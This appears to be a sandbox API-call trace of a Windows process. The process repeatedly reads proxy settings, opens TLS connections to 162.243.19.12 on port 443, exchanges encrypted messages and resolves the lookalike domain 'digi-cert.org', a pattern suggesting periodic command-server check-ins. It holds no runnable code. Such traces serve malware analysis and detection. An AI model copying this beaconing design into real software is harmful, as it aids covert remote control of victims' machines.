	[0140.239] WSASend (in: s=0x7cc, lpBuffers=0x233fc6502f0*=((len=0x3b, buf=0x233e4875ca0*), (len=0xd5, buf=0x233e48787e8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc6502f0*=((len=0x3b, buf=0x233e4875ca0*), (len=0xd5, buf=0x233e48787e8*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0140.239] CoTaskMemFree (pv=0x233fc6502f0) 
	[0140.239] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0140.239] recv (in: s=0x7cc, buf=0x233e4878b88, len=5, flags=0 | out: buf=0x233e4878b88*) returned 5
	[0140.724] recv (in: s=0x7cc, buf=0x233e4878bad, len=1488, flags=0 | out: buf=0x233e4878bad*) returned 1488
	[0140.724] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4879290, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4879290, pfQOP=0x0) returned 0x0
	[0140.724] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0140.724] SetEvent (hEvent=0x6b4) returned 1
	[0140.745] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0161.749] CloseHandle (hObject=0xa80) returned 1
	[0161.931] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0161.932] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x3c4) returned 0x0
	[0161.932] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa58
	[0161.932] RegNotifyChangeKeyValue (hKey=0x3c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa58, fAsynchronous=1) returned 0x0
	[0161.933] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x384) returned 0x0
	[0161.933] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9c8
	[0161.933] RegNotifyChangeKeyValue (hKey=0x384, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9c8, fAsynchronous=1) returned 0x0
	[0161.934] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x9bc) returned 0x0
	[0161.935] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa50
	[0161.935] RegNotifyChangeKeyValue (hKey=0x9bc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa50, fAsynchronous=1) returned 0x0
	[0161.935] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa4c) returned 1
	[0161.936] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68bfa0
	[0161.936] WinHttpSetTimeouts (hInternet=0x233fc68bfa0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0161.936] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0161.952] SetEvent (hEvent=0x6b4) returned 1
	[0161.952] select (in: nfds=0, readfds=0x233e4890140, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4890140, writefds=0x0, exceptfds=0x0) returned 1
	[0161.953] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0161.954] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0161.955] shutdown (s=0x7cc, how=2) returned 0
	[0161.956] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0161.956] closesocket (s=0x7cc) returned 0
	[0161.957] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0161.958] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa68
	[0161.958] WSAConnect (in: s=0x7cc, name=0x233e48918d8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0162.067] closesocket (s=0xa68) returned 0
	[0162.068] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e488e880, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4892160, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4892160, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0162.069] FreeContextBuffer (in: pvContextBuffer=0x233fc6868d0 | out: pvContextBuffer=0x233fc6868d0) returned 0x0
	[0162.069] send (in: s=0x7cc, buf=0x233e4892230*, len=333, flags=0 | out: buf=0x233e4892230*) returned 333
	[0162.069] recv (in: s=0x7cc, buf=0x233e4892230, len=5, flags=0 | out: buf=0x233e4892230*) returned 5
	[0162.186] recv (in: s=0x7cc, buf=0x233e4892235, len=49, flags=0 | out: buf=0x233e4892235*) returned 49
	[0162.187] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e488e880, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4892470, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4892490, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4892490, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0162.188] recv (in: s=0x7cc, buf=0x233e4892580, len=5, flags=0 | out: buf=0x233e4892580*) returned 5
	[0162.188] recv (in: s=0x7cc, buf=0x233e48925a5, len=1, flags=0 | out: buf=0x233e48925a5*) returned 1
	[0162.188] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e488e880, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4892678, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4892698, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4892698, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0162.188] recv (in: s=0x7cc, buf=0x233e4892788, len=5, flags=0 | out: buf=0x233e4892788*) returned 5
	[0162.188] recv (in: s=0x7cc, buf=0x233e48927ad, len=48, flags=0 | out: buf=0x233e48927ad*) returned 48
	[0162.189] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e488e880, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48928b0, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48928d0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48928d0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0162.213] FreeContextBuffer (in: pvContextBuffer=0x233e399bb60 | out: pvContextBuffer=0x233e399bb60) returned 0x0
	[0162.213] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4892a18 | out: pBuffer=0x233e4892a18) returned 0x0
	[0162.214] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4892a70 | out: pBuffer=0x233e4892a70) returned 0x0
	[0162.214] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e4892ad8 | out: pBuffer=0x233e4892ad8) returned 0x0
	[0162.215] CertDuplicateCertificateContext (pCertContext=0x233fc6804b0) returned 0x233fc6804b0
	[0162.215] CertDuplicateStore (hCertStore=0x233fc682da0) returned 0x233fc682da0
	[0162.243] CertEnumCertificatesInStore (hCertStore=0x233fc682da0, pPrevCertContext=0x0) returned 0x233fc6804b0
	[0162.244] CertDuplicateCertificateContext (pCertContext=0x233fc6804b0) returned 0x233fc6804b0
	[0162.244] CertEnumCertificatesInStore (hCertStore=0x233fc682da0, pPrevCertContext=0x233fc6804b0) returned 0x0
	[0162.244] CertCloseStore (hCertStore=0x233fc682da0, dwFlags=0x0) returned 1
	[0162.245] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0162.245] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc683350
	[0162.246] CertAddCRLLinkToStore (in: hCertStore=0x233fc683350, pCrlContext=0x233fc6804b0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0162.246] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc6804b0, pTime=0x350199b4c8, hAdditionalStore=0x233fc683350, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0162.268] CertDuplicateCertificateChain (pChainContext=0x233e39caa40) returned 0x233e39caa40
	[0162.270] CertDuplicateCertificateContext (pCertContext=0x233fc6804b0) returned 0x233fc6804b0
	[0162.271] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0162.272] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0162.272] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0162.272] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233e39caa40, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0162.272] SetLastError (dwErrCode=0x0) 
	[0162.272] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233e39caa40, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0162.273] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0162.273] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0162.274] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48956e0, MessageSeqNo=0x0 | out: pMessage=0x233e48956e0) returned 0x0
	[0162.274] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fed0
	[0162.274] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fed0*=((len=0x3b, buf=0x233e48929a0*), (len=0xd5, buf=0x233e48954e8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fed0*=((len=0x3b, buf=0x233e48929a0*), (len=0xd5, buf=0x233e48954e8*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0162.275] CoTaskMemFree (pv=0x233fc64fed0) 
	[0162.275] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0162.275] recv (in: s=0x7cc, buf=0x233e4895888, len=5, flags=0 | out: buf=0x233e4895888*) returned 5
	[0162.817] recv (in: s=0x7cc, buf=0x233e48958ad, len=1488, flags=0 | out: buf=0x233e48958ad*) returned 1488
	[0162.817] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4895f90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4895f90, pfQOP=0x0) returned 0x0
	[0162.818] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0162.818] SetEvent (hEvent=0x6b4) returned 1
	[0162.872] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0177.876] CloseHandle (hObject=0xa80) returned 1
	[0178.157] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0178.157] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa64) returned 0x0
	[0178.157] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0178.157] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x394, fAsynchronous=1) returned 0x0
	[0178.157] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x3c4) returned 0x0
	[0178.158] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa58
	[0178.158] RegNotifyChangeKeyValue (hKey=0x3c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa58, fAsynchronous=1) returned 0x0
	[0178.158] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x384) returned 0x0
	[0178.158] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9c8
	[0178.158] RegNotifyChangeKeyValue (hKey=0x384, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9c8, fAsynchronous=1) returned 0x0
	[0178.159] GetCurrentProcess () returned 0xffffffffffffffff
	[0178.159] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x9bc) returned 1
	[0178.159] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68aea0
	[0178.159] WinHttpSetTimeouts (hInternet=0x233fc68aea0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0178.159] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0178.172] SetEvent (hEvent=0x6b4) returned 1
	[0178.172] select (in: nfds=0, readfds=0x233e48b4f18, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48b4f18, writefds=0x0, exceptfds=0x0) returned 1
	[0178.173] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0178.174] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0178.175] shutdown (s=0x7cc, how=2) returned 0
	[0178.177] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0178.177] closesocket (s=0x7cc) returned 0
	[0178.178] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0178.178] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa4c
	[0178.178] WSAConnect (in: s=0x7cc, name=0x233e48b66e0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0178.290] closesocket (s=0xa4c) returned 0
	[0178.290] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48b3688, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48b6f68, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48b6f68, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0178.291] FreeContextBuffer (in: pvContextBuffer=0x233fc687e60 | out: pvContextBuffer=0x233fc687e60) returned 0x0
	[0178.291] send (in: s=0x7cc, buf=0x233e48b7038*, len=333, flags=0 | out: buf=0x233e48b7038*) returned 333
	[0178.292] recv (in: s=0x7cc, buf=0x233e48b7038, len=5, flags=0 | out: buf=0x233e48b7038*) returned 5
	[0178.402] recv (in: s=0x7cc, buf=0x233e48b703d, len=49, flags=0 | out: buf=0x233e48b703d*) returned 49
	[0178.402] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48b3688, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48b7278, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48b7298, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48b7298, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0178.402] recv (in: s=0x7cc, buf=0x233e48b7388, len=5, flags=0 | out: buf=0x233e48b7388*) returned 5
	[0178.402] recv (in: s=0x7cc, buf=0x233e48b73ad, len=1, flags=0 | out: buf=0x233e48b73ad*) returned 1
	[0178.402] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48b3688, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48b7480, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48b74a0, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48b74a0, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0178.403] recv (in: s=0x7cc, buf=0x233e48b7590, len=5, flags=0 | out: buf=0x233e48b7590*) returned 5
	[0178.403] recv (in: s=0x7cc, buf=0x233e48b75b5, len=48, flags=0 | out: buf=0x233e48b75b5*) returned 48
	[0178.403] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48b3688, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48b76b8, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48b76d8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48b76d8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0178.404] FreeContextBuffer (in: pvContextBuffer=0x233e399c1c0 | out: pvContextBuffer=0x233e399c1c0) returned 0x0
	[0178.404] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48b7820 | out: pBuffer=0x233e48b7820) returned 0x0
	[0178.404] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48b7878 | out: pBuffer=0x233e48b7878) returned 0x0
	[0178.404] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48b78e0 | out: pBuffer=0x233e48b78e0) returned 0x0
	[0178.405] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0178.405] CertDuplicateStore (hCertStore=0x233fc681fd0) returned 0x233fc681fd0
	[0178.405] CertEnumCertificatesInStore (hCertStore=0x233fc681fd0, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0178.405] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0178.405] CertEnumCertificatesInStore (hCertStore=0x233fc681fd0, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0178.405] CertCloseStore (hCertStore=0x233fc681fd0, dwFlags=0x0) returned 1
	[0178.406] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0178.406] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc683420
	[0178.407] CertAddCRLLinkToStore (in: hCertStore=0x233fc683420, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0178.407] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc683420, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0178.408] CertDuplicateCertificateChain (pChainContext=0x233e39caa40) returned 0x233e39caa40
	[0178.409] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0178.410] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0178.411] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0178.411] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0178.411] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233e39caa40, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0178.411] SetLastError (dwErrCode=0x0) 
	[0178.411] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233e39caa40, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0178.411] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0178.412] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0178.412] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48ba4e8, MessageSeqNo=0x0 | out: pMessage=0x233e48ba4e8) returned 0x0
	[0178.412] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fba0
	[0178.412] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fba0*=((len=0x3b, buf=0x233e48b77a8*), (len=0xd5, buf=0x233e48ba2f0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fba0*=((len=0x3b, buf=0x233e48b77a8*), (len=0xd5, buf=0x233e48ba2f0*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0178.412] CoTaskMemFree (pv=0x233fc64fba0) 
	[0178.412] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0178.412] recv (in: s=0x7cc, buf=0x233e48ba690, len=5, flags=0 | out: buf=0x233e48ba690*) returned 5
	[0178.894] recv (in: s=0x7cc, buf=0x233e48ba6b5, len=1488, flags=0 | out: buf=0x233e48ba6b5*) returned 1488
	[0178.894] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48bad98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48bad98, pfQOP=0x0) returned 0x0
	[0178.894] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0178.895] SetEvent (hEvent=0x6b4) returned 1
	[0178.927] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0189.930] CloseHandle (hObject=0xa80) returned 1
	[0190.111] RtlLookupFunctionEntry (in: ControlPc=0x7ffbf5e09e8d, ImageBase=0x35019994c0, HistoryTable=0x0 | out: ImageBase=0x35019994c0, HistoryTable=0x0) returned 0x7ffbf610a858
	[0190.332] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0190.332] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa64) returned 0x0
	[0190.332] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0190.332] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x394, fAsynchronous=1) returned 0x0
	[0190.333] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x3c4) returned 0x0
	[0190.333] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa58
	[0190.333] RegNotifyChangeKeyValue (hKey=0x3c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa58, fAsynchronous=1) returned 0x0
	[0190.334] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x384) returned 0x0
	[0190.334] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9c8
	[0190.334] RegNotifyChangeKeyValue (hKey=0x384, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9c8, fAsynchronous=1) returned 0x0
	[0190.335] GetCurrentProcess () returned 0xffffffffffffffff
	[0190.335] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x9bc) returned 1
	[0190.335] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689740
	[0190.336] WinHttpSetTimeouts (hInternet=0x233fc689740, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0190.336] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0190.382] SetEvent (hEvent=0x6b4) returned 1
	[0190.383] select (in: nfds=0, readfds=0x233e48c2790, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48c2790, writefds=0x0, exceptfds=0x0) returned 1
	[0190.383] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0190.385] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0190.386] shutdown (s=0x7cc, how=2) returned 0
	[0190.387] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0190.387] closesocket (s=0x7cc) returned 0
	[0190.388] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0190.388] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa4c
	[0190.389] CoTaskMemAlloc (cb=0xf) returned 0x233fc715160
	[0190.389] getaddrinfo (in: pNodeName="digi-cert.org", pServiceName=0x0, pHints=0x350199bba0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x350199bb98 | out: ppResult=0x350199bb98*=0x233fc660c30*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="digi-cert.org", ai_addr=0x233fc7150c0*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) returned 0
	[0190.393] CoTaskMemFree (pv=0x233fc715160) 
	[0190.393] CoTaskMemFree (pv=0x0) 
	[0190.393] FreeAddrInfoW (pAddrInfo=0x233fc660c30*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楤楧挭牥⹴牯g", ai_addr=0x233fc7150c0*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) 
	[0190.393] WSAConnect (in: s=0x7cc, name=0x233e48c42c8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0190.511] closesocket (s=0xa4c) returned 0
